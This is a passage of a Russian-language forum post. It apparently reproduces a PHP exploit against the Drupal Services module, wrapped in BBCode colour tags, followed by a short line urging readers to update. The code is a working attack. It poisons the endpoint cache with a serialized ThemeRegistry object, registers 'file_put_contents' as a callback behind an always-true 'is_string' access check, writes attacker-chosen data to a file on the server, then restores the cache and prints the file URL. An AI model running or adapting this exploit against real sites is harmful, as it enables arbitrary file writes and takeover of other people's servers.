function[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$storage[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$controller[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$settings[/COLOR][COLOR="#007700"]= [
[/COLOR][COLOR="#DD0000"]'services'[/COLOR][COLOR="#007700"]=> [[/COLOR][COLOR="#DD0000"]'resource_api_version'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'1.0'[/COLOR][COLOR="#007700"]]
];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]cid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"services:[/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#DD0000"]:resources"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]# If no endpoint is given, just reset the original values
[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$controller[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$storage[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$controller[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'actions'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]] = [
[/COLOR][COLOR="#DD0000"]'help'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Writes data to a file'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#FF8000"]# Callback function
[/COLOR][COLOR="#DD0000"]'callback'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'file_put_contents'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#FF8000"]# This one does not accept "true" as Drupal does,
# so we just go for a tautology
[/COLOR][COLOR="#DD0000"]'access callback'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'is_string'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'access arguments'[/COLOR][COLOR="#007700"]=> [[/COLOR][COLOR="#DD0000"]'a string'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#FF8000"]# Arguments given through POST
[/COLOR][COLOR="#DD0000"]'args'[/COLOR][COLOR="#007700"]=> [
[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]=> [
[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'string'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'description'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Path to the file'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'source'[/COLOR][COLOR="#007700"]=> [[/COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#DD0000"]'optional'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],
],
[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]=> [
[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'string'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'description'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'The data to write'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'source'[/COLOR][COLOR="#007700"]=> [[/COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#DD0000"]'optional'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],
],
],
[/COLOR][COLOR="#DD0000"]'file'[/COLOR][COLOR="#007700"]=> [
[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'inc'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'services'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'resources/user_resource'[/COLOR][COLOR="#007700"],
],
[/COLOR][COLOR="#DD0000"]'endpoint'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$settings
[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$storage[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$controller[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'endpoint'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'actions'[/COLOR][COLOR="#007700"]] += [
[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=> [
[/COLOR][COLOR="#DD0000"]'enabled'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'settings'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$settings
[/COLOR][COLOR="#007700"]]
];
}
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]storage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$storage[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]keysToPersist[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]array_fill_keys[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]array_keys[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$storage[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
}
}
class[/COLOR][COLOR="#0000BB"]ThemeRegistry[/COLOR][COLOR="#007700"]Extends[/COLOR][COLOR="#0000BB"]DrupalCacheArray[/COLOR][COLOR="#007700"]{
protected[/COLOR][COLOR="#0000BB"]$persistable[/COLOR][COLOR="#007700"];
protected[/COLOR][COLOR="#0000BB"]$completeRegistry[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]cache_poison[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]# Write the file
[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]= (array)[/COLOR][COLOR="#0000BB"]$browser[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]TYPE_JSON[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]json_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#FF8000"]# Stage 3: Restore endpoint's behaviour
[/COLOR][COLOR="#0000BB"]cache_reset[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"]);
if(!(isset([/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]] ===[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'data'[/COLOR][COLOR="#007700"]])))
{
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Failed to write file."[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$file_url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'filename'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"File written:[/COLOR][COLOR="#0000BB"]$file_url[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]# HTTP Browser
[/COLOR][COLOR="#007700"]class[/COLOR][COLOR="#0000BB"]Browser
[/COLOR][COLOR="#007700"]{
private[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"];
private[/COLOR][COLOR="#0000BB"]$controller[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]CONTROLLER[/COLOR][COLOR="#007700"];
private[/COLOR][COLOR="#0000BB"]$action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ACTION[/COLOR][COLOR="#007700"];
function[/COLOR][COLOR="#0000BB"]__construct[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]= [
[/COLOR][COLOR="#DD0000"]"Accept: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TYPE_JSON[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"Content-Type:[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"Content-Length: "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"])
];
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]url[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]controller[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]action[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_init[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_URL[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_HTTPHEADER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$headers[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_POST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_POSTFIELDS[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_RETURNTRANSFER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_SSL_VERIFYHOST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_setopt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CURLOPT_SSL_VERIFYPEER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$output[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curl_error[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]curl_close[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$s[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"cURL:[/COLOR][COLOR="#0000BB"]$error[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]json_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$output[/COLOR][COLOR="#007700"]);
}
}
[/COLOR][COLOR="#FF8000"]# Cache
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]cache_poison[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]ThemeRegistry[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]CONTROLLER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ACTION[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]cache_edit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]);
}
function[/COLOR][COLOR="#0000BB"]cache_reset[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]ThemeRegistry[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$endpoint[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]cache_edit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]);
}
function[/COLOR][COLOR="#0000BB"]cache_edit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"])
{
global[/COLOR][COLOR="#0000BB"]$browser[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]serialize[/COLOR][COLOR="#007700"]([[/COLOR][COLOR="#0000BB"]$tr[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$json[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$browser[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]post[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]TYPE_PHP[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]# Utils
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"])
{
print([/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#DD0000"]\n"[/COLOR][COLOR="#007700"]);
}
function[/COLOR][COLOR="#0000BB"]e[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]);
exit([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]);
}
function[/COLOR][COLOR="#0000BB"]store[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"].json"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]file_put_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]json_encode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]JSON_PRETTY_PRINT[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Stored[/COLOR][COLOR="#0000BB"]$name[/COLOR][COLOR="#DD0000"]information in[/COLOR][COLOR="#0000BB"]$filename[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);
}[/COLOR][/COLOR]
Всем срочно обновляться =)
Источник : Здесь
__________________
...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
